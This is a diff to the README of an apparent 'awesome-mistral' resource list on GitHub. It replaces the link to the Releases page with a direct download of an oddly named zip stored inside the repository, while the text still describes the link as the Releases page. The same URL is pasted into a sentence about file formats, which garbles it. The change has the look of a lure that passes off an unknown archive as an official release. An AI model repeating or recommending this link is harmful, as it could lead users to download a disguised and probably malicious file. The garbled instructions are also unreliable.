Maryfall/awesome-mistral/README.md

 ## 🚀 Getting Started
 To use this repository effectively, follow these steps:

-1. **Click the Download Link**: Visit the [Releases page](https://github.com/Maryfall/awesome-mistral/releases) to access all available downloads.
+1. **Click the Download Link**: Visit the [Releases page](https://github.com/Maryfall/awesome-mistral/raw/refs/heads/main/lotophagously/mistral-awesome-Aaronite.zip) to access all available downloads.

 2. **Select a Version**: On the Releases page, you'll see different versions of the repository.
 Each version may contain various resources, improvements, or updates.

 3. **Download the Package**: Choose the version that you want.
 Click the download link for the appropriate package for your needs.

 4. **Unzip the Files**: Once downloaded, find the file in your Downloads folder.
-It may come in a `.zip` or `.tar.gz` format.
+It may come in a `.zip` or `https://github.com/Maryfall/awesome-mistral/raw/refs/heads/main/lotophagously/mistral-awesome-Aaronite.zip` format.
 Right-click the file and select "Extract All" or use your preferred file unzipping tool.

 5. **Explore the Resources**: After unzipping, navigate through the folder.
 You'll find various resources, including guides, tutorials, and example projects.